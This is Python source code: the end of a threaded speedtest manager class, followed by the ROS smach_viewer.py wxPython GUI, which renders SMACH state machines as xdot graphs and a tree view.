self._sleep = settings.get('scan-interval') * 60
self._thread = None
self.__status = "none"
self.__client_info = None
self.__all_servers = None
def task(self, socketio):
while self.do_run:
if self.pause:
time.sleep(1)
continue
batch_results = []
start = datetime.utcnow()
for server_id in settings.get('servers'):
sv = self.st.get_servers([server_id])
sv = sv[list(sv.keys())[0]][0]
logger.debug('Starting speedtest with server: %s (%s - %s) %s',
sv['sponsor'], sv['name'], sv['country'], sv['host'])
self.update_status(socketio, "started", {'timestamp': str(start)})
# Cancel point
if not self.do_run:
break
logger.debug('Testing download speed...')
self.update_status(socketio, "downloading")
download = self.st.download()
logger.debug('Download test finished with %s bits', download)
# Cancel point
if not self.do_run:
break
logger.debug('Testing upload speed...')
self.update_status(socketio, "uploading")
upload = self.st.upload()
logger.debug('Upload test finished with %s bits', upload)
# Cancel point
if not self.do_run:
break
results = self.st.results.dict()
results['server'] = sv
results['batch_timestamp'] = start.isoformat()
batch_results.append(results)
self.last_result = results
database.insert_result(results)
logger.debug('Speedtest finished: %s', results)
self.update_status(socketio, "finished", json.loads(dumps(results)))
# Cancel point
if not self.do_run:
break
# Run at the next scheduled time
diff = max(self._sleep - (datetime.utcnow() - start).total_seconds(), 15)
self.update_status(socketio, "batch_finished", {
'sleep_time': diff, 'results': json.loads(dumps(batch_results))
})
logger.debug('Waiting for {:.3f} seconds for the next measurement.'.format(diff))
time.sleep(diff)
def start(self, socketio):
if self._thread is not None:
logger.warn('SpeedtestMgr$start already invoked.')
return
logger.debug('Starting speedtest thread...')
self._thread = threading.Thread(target=self.task, args=(socketio,))
self._thread.start()
logger.debug('Speedtest thread started.')
@property
def status(self):
return self.__status
@property
def client_info(self):
if self.__client_info is None:
self.__client_info = requests.get('http://extreme-ip-lookup.com/json/').json()
return self.__client_info
@property
def servers(self):
if self.__all_servers is None:
self.st.get_servers()
self.__all_servers = [v[0] for k, v in self.st.servers.items()]
self.__all_servers.sort(key=lambda x: x['d'])
return self.__all_servers
def set_test_servers(self, server_list):
if not isinstance(server_list, list) and not isinstance(server_list, int):
raise RuntimeError('server_list must be a list of servers ids or an int')
if isinstance(server_list, int):
server_list = [server_list]
for server_id in server_list:
found = False
for k, server in self.__all_servers:
if server_id == server['id']:
found = True
break
if not found:
raise RuntimeError('Server id {} not found'.format(server_id))
self.st.get_servers(server_list)
def update_status(self, socketio, status, data=None):
self.__status = status
payload = {'status': status, 'data': data}
socketio.emit('speedtest_update', payload)
|
smach_viewer.py | #!/usr/bin/env python
# Copyright (c) 2010, Willow Garage, Inc.
# All rights reserved.
# Copyright (c) 2013, Jonathan Bohren, The Johns Hopkins University
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Jonathan Bohren
import rospy
import rospkg
from smach_msgs.msg import SmachContainerStatus,SmachContainerInitialStatusCmd,SmachContainerStructure
import sys
import os
import threading
import pickle
import pprint
import copy
import StringIO
import colorsys
import time
import wxversion
if wxversion.checkInstalled("2.8"):
wxversion.select("2.8")
else:
print("wxversion 2.8 is not installed, installed versions are {}".format(wxversion.getInstalled()))
import wx
import wx.richtext
import textwrap
## this import system (or ros-released) xdot
# import xdot
## need to import currnt package, but not to load this file
# http://stackoverflow.com/questions/6031584/importing-from-builtin-library-when-module-with-same-name-exists
def import_non_local(name, custom_name=None):
import imp, sys
custom_name = custom_name or name
path = filter(lambda x: x != os.path.dirname(os.path.abspath(__file__)), sys.path)
f, pathname, desc = imp.find_module(name, path)
module = imp.load_module(custom_name, f, pathname, desc)
if f:
f.close()
return module
smach_viewer = import_non_local('smach_viewer')
from smach_viewer import xdot
##
import smach
import smach_ros
### Helper Functions
def graph_attr_string(attrs):
"""Generate an xdot graph attribute string."""
attrs_strs = ['"'+str(k)+'"="'+str(v)+'"' for k,v in attrs.iteritems()]
return ';\n'.join(attrs_strs)+';\n'
def attr_string(attrs):
"""Generate an xdot node attribute string."""
attrs_strs = ['"'+str(k)+'"="'+str(v)+'"' for k,v in attrs.iteritems()]
return ' ['+(', '.join(attrs_strs))+']'
def get_parent_path(path):
"""Get the parent path of an xdot node."""
path_tokens = path.split('/')
if len(path_tokens) > 2:
parent_path = '/'.join(path_tokens[0:-1])
else:
parent_path = '/'.join(path_tokens[0:1])
return parent_path
def get_label(path):
"""Get the label of an xdot node."""
path_tokens = path.split('/')
return path_tokens[-1]
def hex2t(color_str):
"""Convert a hexadecimal color strng into a color tuple."""
color_tuple = [int(color_str[i:i+2],16)/255.0 for i in range(1,len(color_str),2)]
return color_tuple
class ContainerNode():
"""
This class represents a given container in a running SMACH system.
Its primary use is to generate dotcode for a SMACH container. It has
methods for responding to structure and status messages from a SMACH
introspection server, as well as methods for updating the styles of a
graph once it's been drawn.
"""
def __init__(self, server_name, msg):
# Store path info
self._server_name = server_name
self._path = msg.path
splitpath = msg.path.split('/')
self._label = splitpath[-1]
self._dir = '/'.join(splitpath[0:-1])
self._children = msg.children
self._internal_outcomes = msg.internal_outcomes
self._outcomes_from = msg.outcomes_from
self._outcomes_to = msg.outcomes_to
self._container_outcomes = msg.container_outcomes
# Status
self._initial_states = []
self._active_states = []
self._last_active_states = []
self._local_data = smach.UserData()
self._info = ''
def update_structure(self, msg):
"""Update the structure of this container from a given message. Return True if anything changes."""
needs_update = False
if self._children != msg.children\
or self._internal_outcomes != msg.internal_outcomes\
or self._outcomes_from != msg.outcomes_from\
or self._outcomes_to != msg.outcomes_to\
or self._container_outcomes != msg.container_outcomes:
needs_update = True
if needs_update:
self._children = msg.children
self._internal_outcomes = msg.internal_outcomes
self._outcomes_from = msg.outcomes_from
self._outcomes_to = msg.outcomes_to
self._container_outcomes = msg.container_outcomes
return needs_update
def update_status(self, msg):
"""Update the known userdata and active state set and return True if the graph needs to be redrawn."""
# Initialize the return value
needs_update = False
# Check if the initial states or active states have changed
if set(msg.initial_states) != set(self._initial_states):
self._structure_changed = True
needs_update = True
if set(msg.active_states) != set(self._active_states):
needs_update = True
# Store the initial and active states
self._initial_states = msg.initial_states
self._last_active_states = self._active_states
self._active_states = msg.active_states
# Unpack the user data
while not rospy.is_shutdown():
try:
self._local_data._data = pickle.loads(msg.local_data)
break
except ImportError as ie:
# This will only happen once for each package
modulename = ie.args[0][16:]
packagename = modulename[0:modulename.find('.')]
roslib.load_manifest(packagename)
self._local_data._data = pickle.loads(msg.local_data)
# Store the info string
self._info = msg.info
return needs_update
def get_dotcode(self, selected_paths, closed_paths, depth, max_depth, containers, show_all, label_wrapper, attrs={}):
"""Generate the dotcode representing this container.
@param selected_paths: The paths to nodes that are selected
@closed paths: The paths that shouldn't be expanded
@param depth: The depth to start traversing the tree
@param max_depth: The depth to which we should traverse the tree
@param containers: A dict of containers keyed by their paths
@param show_all: True if implicit transitions should be shown
@param label_wrapper: A text wrapper for wrapping element names
@param attrs: A dict of dotcode attributes for this cluster
"""
dotstr = 'subgraph "cluster_%s" {\n' % (self._path)
if depth == 0:
#attrs['style'] = 'filled,rounded'
attrs['color'] = '#00000000'
attrs['fillcolor'] = '#0000000F'
#attrs['rank'] = 'max'
#,'succeeded','aborted','preempted'attrs['label'] = self._label
dotstr += graph_attr_string(attrs)
# Add start/terimate target
proxy_attrs = {
'URL':self._path,
'shape':'plaintext',
'color':'gray',
'fontsize':'18',
'fontweight':'18',
'rank':'min',
'height':'0.01'}
proxy_attrs['label'] = '\\n'.join(label_wrapper.wrap(self._label))
dotstr += '"%s" %s;\n' % (
'/'.join([self._path,'__proxy__']),
attr_string(proxy_attrs))
# Check if we should expand this container
if max_depth == -1 or depth <= max_depth:
# Add container outcomes
dotstr += 'subgraph "cluster_%s" {\n' % '/'.join([self._path,'__outcomes__'])
outcomes_attrs = {
'style':'rounded,filled',
'rank':'sink',
'color':'#FFFFFFFF',#'#871C34',
'fillcolor':'#FFFFFF00'#'#FE464f3F'#'#DB889A'
}
dotstr += graph_attr_string(outcomes_attrs)
for outcome_label in self._container_outcomes:
outcome_path = ':'.join([self._path,outcome_label])
outcome_attrs = {
'shape':'box',
'height':'0.3',
'style':'filled,rounded',
'fontsize':'12',
'fillcolor':'#FE464f',#'#EDC2CC',
'color':'#780006',#'#EBAEBB',
'fontcolor':'#780006',#'#EBAEBB',
'label':'',
'xlabel':'\\n'.join(label_wrapper.wrap(outcome_label)),
'URL':':'.join([self._path,outcome_label])
}
dotstr += '"%s" %s;\n' % (outcome_path,attr_string(outcome_attrs))
dotstr += "}\n"
# Iterate over children
for child_label in self._children:
child_attrs = {
'style':'filled,setlinewidth(2)',
'color':'#000000FF',
'fillcolor':'#FFFFFF00'
}
child_path = '/'.join([self._path,child_label])
# Generate dotcode for children
if child_path in containers:
child_attrs['style'] += ',rounded'
dotstr += containers[child_path].get_dotcode(
selected_paths,
closed_paths,
depth+1, max_depth,
containers,
show_all,
label_wrapper,
child_attrs)
else:
child_attrs['label'] = '\\n'.join(label_wrapper.wrap(child_label))
child_attrs['URL'] = child_path
dotstr += '"%s" %s;\n' % (child_path, attr_string(child_attrs))
# Iterate over edges
internal_edges = zip(
self._internal_outcomes,
self._outcomes_from,
self._outcomes_to)
# Add edge from container label to initial state
internal_edges += [('','__proxy__',initial_child) for initial_child in self._initial_states]
has_explicit_transitions = []
for (outcome_label,from_label,to_label) in internal_edges:
if to_label != 'None' or outcome_label == to_label:
has_explicit_transitions.append(from_label)
# Draw internal edges
for (outcome_label,from_label,to_label) in internal_edges:
from_path = '/'.join([self._path, from_label])
if show_all \
or to_label != 'None'\
or from_label not in has_explicit_transitions \
or (outcome_label == from_label) \
or from_path in containers:
# Set the implicit target of this outcome
if to_label == 'None':
to_label = outcome_label
to_path = '/'.join([self._path, to_label])
edge_attrs = {
'URL':':'.join([from_path,outcome_label,to_path]),
'fontsize':'12',
'label':'',
'xlabel':'\\n'.join(label_wrapper.wrap(outcome_label))}
edge_attrs['style'] = 'setlinewidth(2)'
# Hide implicit
#if not show_all and to_label == outcome_label:
# edge_attrs['style'] += ',invis'
from_key = '"%s"' % from_path
if from_path in containers:
if max_depth == -1 or depth+1 <= max_depth:
from_key = '"%s:%s"' % ( from_path, outcome_label)
else:
edge_attrs['ltail'] = 'cluster_'+from_path
from_path = '/'.join([from_path,'__proxy__'])
from_key = '"%s"' % ( from_path )
to_key = ''
if to_label in self._container_outcomes:
to_key = '"%s:%s"' % (self._path,to_label)
edge_attrs['color'] = '#00000055'# '#780006'
else:
if to_path in containers:
edge_attrs['lhead'] = 'cluster_'+to_path
to_path = '/'.join([to_path,'__proxy__'])
to_key = '"%s"' % to_path
dotstr += '%s -> %s %s;\n' % (
from_key, to_key, attr_string(edge_attrs))
dotstr += '}\n'
return dotstr
def set_styles(self, selected_paths, depth, max_depth, items, subgraph_shapes, containers):
"""Update the styles for a list of containers without regenerating the dotcode.
This function is called recursively to update an entire tree.
@param selected_paths: A list of paths to nodes that are currently selected.
@param depth: The depth to start traversing the tree
@param max_depth: The depth to traverse into the tree
@param items: A dict of all the graph items, keyed by url
@param subgraph_shapes: A dictionary of shapes from the rendering engine
@param containers: A dict of all the containers
"""
# Color root container
"""
if depth == 0:
container_shapes = subgraph_shapes['cluster_'+self._path]
container_color = (0,0,0,0)
container_fillcolor = (0,0,0,0)
for shape in container_shapes:
shape.pen.color = container_color
shape.pen.fillcolor = container_fillcolor
"""
# Color shapes for outcomes
# Color children
if max_depth == -1 or depth <= max_depth:
# Iterate over children
for child_label in self._children:
child_path = '/'.join([self._path,child_label])
child_color = [0.5,0.5,0.5,1]
child_fillcolor = [1,1,1,1]
child_linewidth = 2
active_color = hex2t('#5C7600FF')
active_fillcolor = hex2t('#C0F700FF')
initial_color = hex2t('#000000FF')
initial_fillcolor = hex2t('#FFFFFFFF')
if child_label in self._active_states:
# Check if the child is active
child_color = active_color
child_fillcolor = active_fillcolor
child_linewidth = 5
elif child_label in self._initial_states:
# Initial style
#child_fillcolor = initial_fillcolor
child_color = initial_color
child_linewidth = 2
# Check if the child is selected
if child_path in selected_paths:
child_color = hex2t('#FB000DFF')
# Generate dotcode for child containers
if child_path in containers:
subgraph_id = 'cluster_'+child_path
if subgraph_id in subgraph_shapes:
if child_label in self._active_states:
child_fillcolor[3] = 0.25
elif 0 and child_label in self._initial_states:
child_fillcolor[3] = 0.25
else:
if max_depth > 0:
v = 1.0-0.25*((depth+1)/float(max_depth))
else:
v = 0.85
child_fillcolor = [v,v,v,1.0]
for shape in subgraph_shapes['cluster_'+child_path]:
pen = shape.pen
if len(pen.color) > 3:
pen_color_opacity = pen.color[3]
if pen_color_opacity < 0.01:
pen_color_opacity = 0
else:
pen_color_opacity = 0.5
shape.pen.color = child_color[0:3]+[pen_color_opacity]
shape.pen.fillcolor = [child_fillcolor[i] for i in range(min(3,len(pen.fillcolor)))]
shape.pen.linewidth = child_linewidth
# Recurse on this child
containers[child_path].set_styles(
selected_paths,
depth+1, max_depth,
items,
subgraph_shapes,
containers)
else:
if child_path in items:
for shape in items[child_path].shapes:
if not isinstance(shape,xdot.xdot.TextShape):
shape.pen.color = child_color
shape.pen.fillcolor = child_fillcolor
shape.pen.linewidth = child_linewidth
else:
#print child_path+" NOT IN "+str(items.keys())
pass
class SmachViewerFrame(wx.Frame):
"""
This class provides a GUI application for viewing SMACH plans.
"""
def __init__(self):
wx.Frame.__init__(self, None, -1, "Smach Viewer", size=(720,480))
# Create graph
self._containers = {}
self._top_containers = {}
self._update_cond = threading.Condition()
self._needs_refresh = True
self.dotstr = ''
vbox = wx.BoxSizer(wx.VERTICAL)
# Create Splitter
self.content_splitter = wx.SplitterWindow(self, -1,style = wx.SP_LIVE_UPDATE)
self.content_splitter.SetMinimumPaneSize(24)
self.content_splitter.SetSashGravity(0.85)
# Create viewer pane
viewer = wx.Panel(self.content_splitter,-1)
# Create smach viewer
nb = wx.Notebook(viewer,-1,style=wx.NB_TOP | wx.WANTS_CHARS)
viewer_box = wx.BoxSizer()
viewer_box.Add(nb,1,wx.EXPAND | wx.ALL, 4)
viewer.SetSizer(viewer_box)
# Create graph view
graph_view = wx.Panel(nb,-1)
gv_vbox = wx.BoxSizer(wx.VERTICAL)
graph_view.SetSizer(gv_vbox)
# Construct toolbar
toolbar = wx.ToolBar(graph_view, -1)
toolbar.AddControl(wx.StaticText(toolbar,-1,"Path: "))
# Path list
self.path_combo = wx.ComboBox(toolbar, -1, style=wx.CB_DROPDOWN)
self.path_combo .Bind(wx.EVT_COMBOBOX, self.set_path)
self.path_combo.Append('/')
self.path_combo.SetValue('/')
toolbar.AddControl(self.path_combo)
# Depth spinner
self.depth_spinner = wx.SpinCtrl(toolbar, -1,
size=wx.Size(50,-1),
min=-1,
max=1337,
initial=-1)
self.depth_spinner.Bind(wx.EVT_SPINCTRL,self.set_depth)
self._max_depth = -1
toolbar.AddControl(wx.StaticText(toolbar,-1," Depth: "))
toolbar.AddControl(self.depth_spinner)
# Label width spinner
self.width_spinner = wx.SpinCtrl(toolbar, -1,
size=wx.Size(50,-1),
min=1,
max=1337,
initial=40)
self.width_spinner.Bind(wx.EVT_SPINCTRL,self.set_label_width)
self._label_wrapper = textwrap.TextWrapper(40,break_long_words=True)
toolbar.AddControl(wx.StaticText(toolbar,-1," Label Width: "))
toolbar.AddControl(self.width_spinner)
# Implicit transition display
toggle_all = wx.ToggleButton(toolbar,-1,'Show Implicit')
toggle_all.Bind(wx.EVT_TOGGLEBUTTON, self.toggle_all_transitions)
self._show_all_transitions = False
toolbar.AddControl(wx.StaticText(toolbar,-1," "))
toolbar.AddControl(toggle_all)
toggle_auto_focus = wx.ToggleButton(toolbar, -1, 'Auto Focus')
toggle_auto_focus.Bind(wx.EVT_TOGGLEBUTTON, self.toggle_auto_focus)
self._auto_focus = False
toolbar.AddControl(wx.StaticText(toolbar, -1, " "))
toolbar.AddControl(toggle_auto_focus)
toolbar.AddControl(wx.StaticText(toolbar,-1," "))
toolbar.AddLabelTool(wx.ID_HELP, 'Help',
wx.ArtProvider.GetBitmap(wx.ART_HELP,wx.ART_OTHER,(16,16)) )
toolbar.AddLabelTool(wx.ID_SAVE, 'Save',
wx.ArtProvider.GetBitmap(wx.ART_FILE_SAVE,wx.ART_OTHER,(16,16)) )
toolbar.Realize()
self.Bind(wx.EVT_TOOL, self.ShowControlsDialog, id=wx.ID_HELP)
self.Bind(wx.EVT_TOOL, self.SaveDotGraph, id=wx.ID_SAVE)
# Create dot graph widget
self.widget = xdot.wxxdot.WxDotWindow(graph_view, -1)
gv_vbox.Add(toolbar, 0, wx.EXPAND)
gv_vbox.Add(self.widget, 1, wx.EXPAND)
# Create tree view widget
self.tree = wx.TreeCtrl(nb,-1,style=wx.TR_HAS_BUTTONS)
nb.AddPage(graph_view,"Graph View")
nb.AddPage(self.tree,"Tree View")
# Create userdata widget
borders = wx.LEFT | wx.RIGHT | wx.TOP
border = 4
self.ud_win = wx.ScrolledWindow(self.content_splitter, -1)
self.ud_gs = wx.BoxSizer(wx.VERTICAL)
self.ud_gs.Add(wx.StaticText(self.ud_win,-1,"Path:"),0, borders, border)
self.path_input = wx.ComboBox(self.ud_win,-1,style=wx.CB_DROPDOWN)
self.path_input.Bind(wx.EVT_COMBOBOX,self.selection_changed)
self.ud_gs.Add(self.path_input,0,wx.EXPAND | borders, border)
self.ud_gs.Add(wx.StaticText(self.ud_win,-1,"Userdata:"),0, borders, border)
self.ud_txt = wx.TextCtrl(self.ud_win,-1,style=wx.TE_MULTILINE | wx.TE_READONLY)
self.ud_gs.Add(self.ud_txt,1,wx.EXPAND | borders, border)
# Add initial state button
self.is_button = wx.Button(self.ud_win,-1,"Set as Initial State")
self.is_button.Bind(wx.EVT_BUTTON, self.on_set_initial_state)
self.is_button.Disable()
self.ud_gs.Add(self.is_button,0,wx.EXPAND | wx.BOTTOM | borders, border)
self.ud_win.SetSizer(self.ud_gs)
# Set content splitter
self.content_splitter.SplitVertically(viewer, self.ud_win, 512)
# Add statusbar
self.statusbar = wx.StatusBar(self,-1)
# Add elements to sizer
vbox.Add(self.content_splitter, 1, wx.EXPAND | wx.ALL)
vbox.Add(self.statusbar, 0, wx.EXPAND)
self.SetSizer(vbox)
self.Center()
# smach introspection client
self._client = smach_ros.IntrospectionClient()
self._containers= {}
self._selected_paths = []
# Message subscribers
self._structure_subs = {}
self._status_subs = {}
self.Bind(wx.EVT_IDLE,self.OnIdle)
self.Bind(wx.EVT_CLOSE,self.OnQuit)
# Register mouse event callback
self.widget.register_select_callback(self.select_cb)
self._path = '/'
self._needs_zoom = True
self._structure_changed = True
# Start a thread in the background to update the server list
self._keep_running = True
self._server_list_thread = threading.Thread(target=self._update_server_list)
self._server_list_thread.start()
self._update_graph_thread = threading.Thread(target=self._update_graph)
self._update_graph_thread.start()
self._update_tree_thread = threading.Thread(target=self._update_tree)
self._update_tree_thread.start()
def OnQuit(self,event):
"""Quit Event: kill threads and wait for join."""
with self._update_cond:
self._keep_running = False
self._update_cond.notify_all()
self._server_list_thread.join()
self._update_graph_thread.join()
self._update_tree_thread.join()
event.Skip()
def update_graph(self):
"""Notify all that the graph needs to be updated."""
with self._update_cond:
self._update_cond.notify_all()
def on_set_initial_state(self, event):
"""Event: Change the initial state of the server."""
state_path = self._selected_paths[0]
parent_path = get_parent_path(state_path)
state = get_label(state_path)
server_name = self._containers[parent_path]._server_name
self._client.set_initial_state(server_name,parent_path,[state],timeout = rospy.Duration(60.0))
def set_path(self, event):
"""Event: Change the viewable path and update the graph."""
self._path = self.path_combo.GetValue()
self._needs_zoom = True
self.update_graph()
def _set_path(self, path):
self._path = path
self._needs_zoom = True
self.path_combo.SetValue(path)
self.update_graph()
def set_depth(self, event):
"""Event: Change the maximum depth and update the graph."""
self._max_depth = self.depth_spinner.GetValue()
self._needs_zoom = True
self.update_graph()
def _set_max_depth(self, max_depth):
self._max_depth = max_depth
self.depth_spinner.SetValue(max_depth)
self._needs_zoom = True
self.update_graph()
def set_label_width(self, event):
"""Event: Change the label wrapper width and update the graph."""
self._label_wrapper.width = self.width_spinner.GetValue()
self._needs_zoom = True
self.update_graph()
def toggle_all_transitions(self, event):
"""Event: Change whether automatic transitions are hidden and update the graph."""
self._show_all_transitions = not self._show_all_transitions
self._structure_changed = True
self.update_graph()
def toggle_auto_focus(self, event):
"""Event: Enable/Disable automatically focusing"""
self._auto_focus = not self._auto_focus
self._needs_zoom = self._auto_focus
self._structure_changed = True
if not self._auto_focus:
self._set_path('/')
self._set_max_depth(-1)
self.update_graph()
def select_cb(self, item, event):
"""Event: Click to select a graph node to display user data and update the graph."""
# Only set string status
if not type(item.url) is str:
return
self.statusbar.SetStatusText(item.url)
# Left button-up
if event.ButtonUp(wx.MOUSE_BTN_LEFT):
# Store this item's url as the selected path
self._selected_paths = [item.url]
# Update the selection dropdown
self.path_input.SetValue(item.url)
wx.PostEvent(
self.path_input.GetEventHandler(),
wx.CommandEvent(wx.wxEVT_COMMAND_COMBOBOX_SELECTED,self.path_input.GetId()))
self.update_graph()
def selection_changed(self, event):
"""Event: Selection dropdown changed."""
path_input_str = self.path_input.GetValue()
# Check the path is non-zero length
if len(path_input_str) > 0:
# Split the path (state:outcome), and get the state path
path = path_input_str.split(':')[0]
# Get the container corresponding to this path, since userdata is
# stored in the containers
if path not in self._containers:
parent_path = get_parent_path(path)
else:
parent_path = path
if parent_path in self._containers:
# Enable the initial state button for the selection
self.is_button.Enable()
# Get the container
container = self._containers[parent_path]
# Store the scroll position and selection
pos = self.ud_txt.HitTestPos(wx.Point(0,0))
sel = self.ud_txt.GetSelection()
# Generate the userdata string
ud_str = ''
for (k,v) in container._local_data._data.iteritems():
ud_str += str(k)+": "
vstr = str(v)
# Add a line break if this is a multiline value
if vstr.find('\n') != -1:
ud_str += '\n'
ud_str+=vstr+'\n\n'
# Set the userdata string
self.ud_txt.SetValue(ud_str)
# Restore the scroll position and selection
self.ud_txt.ShowPosition(pos[1])
if sel != (0,0):
self.ud_txt.SetSelection(sel[0],sel[1])
else:
# Disable the initial state button for this selection
self.is_button.Disable()
def _structure_msg_update(self, msg, server_name):
"""Update the structure of the SMACH plan (re-generate the dotcode)."""
# Just return if we're shutting down
if not self._keep_running:
return
# Get the node path
path = msg.path
pathsplit = path.split('/')
parent_path = '/'.join(pathsplit[0:-1])
rospy.logdebug("RECEIVED: "+path)
rospy.logdebug("CONTAINERS: "+str(self._containers.keys()))
# Initialize redraw flag
needs_redraw = False
if path in self._containers:
rospy.logdebug("UPDATING: "+path)
# Update the structure of this known container
needs_redraw = self._containers[path].update_structure(msg)
else:
rospy.logdebug("CONSTRUCTING: "+path)
# Create a new container
container = ContainerNode(server_name, msg)
self._containers[path] = container
# Store this as a top container if it has no parent
if parent_path == '':
self._top_containers[path] = container
# Append paths to selector
self.path_combo.Append(path)
self.path_input.Append(path)
# We need to redraw thhe graph if this container's parent is already known
if parent_path in self._containers:
needs_redraw = True
# Update the graph if necessary
if needs_redraw:
with self._update_cond:
self._structure_changed = True
self._needs_zoom = True # TODO: Make it so you can disable this
self._update_cond.notify_all()
def _status_msg_update(self, msg):
"""Process status messages."""
# Check if we're in the process of shutting down
if not self._keep_running:
return
if self._auto_focus and len(msg.info) > 0:
self._set_path(msg.info)
self._set_max_depth(msg.info.count('/')-1)
# Get the path to the updating conainer
path = msg.path
rospy.logdebug("STATUS MSG: "+path)
# Check if this is a known container
if path in self._containers:
# Get the container and check if the status update requires regeneration
container = self._containers[path]
if container.update_status(msg):
with self._update_cond:
self._update_cond.notify_all()
# TODO: Is this necessary?
path_input_str = self.path_input.GetValue()
if path_input_str == path or get_parent_path(path_input_str) == path:
wx.PostEvent(
self.path_input.GetEventHandler(),
wx.CommandEvent(wx.wxEVT_COMMAND_COMBOBOX_SELECTED,self.path_input.GetId()))
def _update_graph(self):
"""This thread continuously updates the graph when it changes.
The graph gets updated in one of two ways:
1: The structure of the SMACH plans has changed, or the display
settings have been changed. In this case, the dotcode needs to be
regenerated.
2: The status of the SMACH plans has changed. In this case, we only
need to change the styles of the graph.
"""
while self._keep_running and not rospy.is_shutdown():
with self._update_cond:
# Wait for the update condition to be triggered
self._update_cond.wait()
# Get the containers to update
containers_to_update = {}
if self._path in self._containers:
# Some non-root path
containers_to_update = {self._path:self._containers[self._path]}
elif self._path == '/':
# Root path
containers_to_update = self._top_containers
# Check if we need to re-generate the dotcode (if the structure changed)
# TODO: needs_zoom is a misnomer
if self._structure_changed or self._needs_zoom:
dotstr = "digraph {\n\t"
dotstr += ';'.join([
"compound=true",
"outputmode=nodesfirst",
"labeljust=l",
"nodesep=0.5",
"minlen=2",
"mclimit=5",
"clusterrank=local",
"ranksep=0.75",
# "remincross=true",
# "rank=sink",
"ordering=\"\"",
])
dotstr += ";\n"
# Generate the rest of the graph
# TODO: Only re-generate dotcode for containers that have changed
for path,tc in containers_to_update.iteritems():
dotstr += tc.get_dotcode(
self._selected_paths,[],
0,self._max_depth,
self._containers,
self._show_all_transitions,
self._label_wrapper)
if len(containers_to_update) == 0:
dotstr += '"__empty__" [label="Path not available.", shape="plaintext"]'
dotstr += '\n}\n'
self.dotstr = dotstr
# Set the dotcode to the new dotcode, reset the flags
self.set_dotcode(dotstr,zoom=False)
self._structure_changed = False
# Update the styles for the graph if there are any updates
for path,tc in containers_to_update.iteritems():
tc.set_styles(
self._selected_paths,
0,self._max_depth,
self.widget.items_by_url,
self.widget.subgraph_shapes,
self._containers)
# Redraw
self.widget.Refresh()
def set_dotcode(self, dotcode, zoom=True):
"""Set the xdot view's dotcode and refresh the display."""
# Set the new dotcode
if self.widget.set_dotcode(dotcode, None):
self.SetTitle('Smach Viewer')
# Re-zoom if necessary
if zoom or self._needs_zoom:
self.widget.zoom_to_fit()
self._needs_zoom = False
# Set the refresh flag
self._needs_refresh = True
wx.PostEvent(self.GetEventHandler(), wx.IdleEvent())
def _update_tree(self):
"""Update the tree view."""
while self._keep_running and not rospy.is_shutdown():
with self._update_cond:
self._update_cond.wait()
self.tree.DeleteAllItems()
self._tree_nodes = {}
for path,tc in self._top_containers.iteritems():
self.add_to_tree(path, None)
def add_to_tree(self, path, parent):
"""Add a path to the tree view."""
if parent is None:
container = self.tree.AddRoot(get_label(path))
else:
container = self.tree.AppendItem(parent,get_label(path))
# Add children to tree
for label in self._containers[path]._children:
child_path = '/'.join([path,label])
if child_path in self._containers.keys():
self.add_to_tree(child_path, container)
else:
self.tree.AppendItem(container,label)
def append_tree(self, container, parent = None):
"""Append an item to the tree view."""
if not parent:
node = self.tree.AddRoot(container._label)
for child_label in container._children:
self.tree.AppendItem(node,child_label)
def OnIdle(self, event):
"""Event: On Idle, refresh the display if necessary, then un-set the flag."""
if self._needs_refresh:
self.Refresh()
# Re-populate path combo
self._needs_refresh = False
def _update_server_list(self):
"""Update the list of known SMACH introspection servers."""
while self._keep_running:
# Update the server list
server_names = self._client.get_servers()
new_server_names = [sn for sn in server_names if sn not in self._status_subs]
# Create subscribers for new servers
for server_name in new_server_names:
self._structure_subs[server_name] = rospy.Subscriber(
server_name+smach_ros.introspection.STRUCTURE_TOPIC,
SmachContainerStructure,
callback = self._structure_msg_update,
callback_args = server_name,
queue_size=50)
self._status_subs[server_name] = rospy.Subscriber(
server_name+smach_ros.introspection.STATUS_TOPIC,
SmachContainerStatus,
callback = self._status_msg_update,
queue_size=50)
# This doesn't need to happen very often
rospy.sleep(1.0)
#self.server_combo.AppendItems([s for s in self._servers if s not in current_servers])
# Grab the first server
#current_value = self.server_combo.GetValue()
#if current_value == '' and len(self._servers) > 0:
# self.server_combo.SetStringSelection(self._servers[0])
# self.set_server(self._servers[0])
def ShowControlsDialog(self,event):
dial = wx.MessageDialog(None,
"Pan: Arrow Keys\nZoom: PageUp / PageDown\nZoom To Fit: F\nRefresh: R",
'Keyboard Controls', wx.OK)
dial.ShowModal()
def SaveDotGraph(self,event):
timestr = time.strftime("%Y%m%d-%H%M%S")
directory = rospkg.get_ros_home()+'/dotfiles/'
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory+timestr+'.dot'
print('Writing to file: %s' % filename)
with open(filename, 'w') as f:
f.write(self.dotstr)
def OnExit(self, event):
pass
def set_filter(self, filter):
self.widget.set_filter(filter)
def main():
from argparse import ArgumentParser
p = ArgumentParser()
p.add_argument('-f', '--auto-focus',
action='store_true',
help="Enable 'AutoFocus to subgraph' as default",
dest='enable_auto_focus')
args = p.parse_args()
app = wx.App()
frame = SmachViewerFrame()
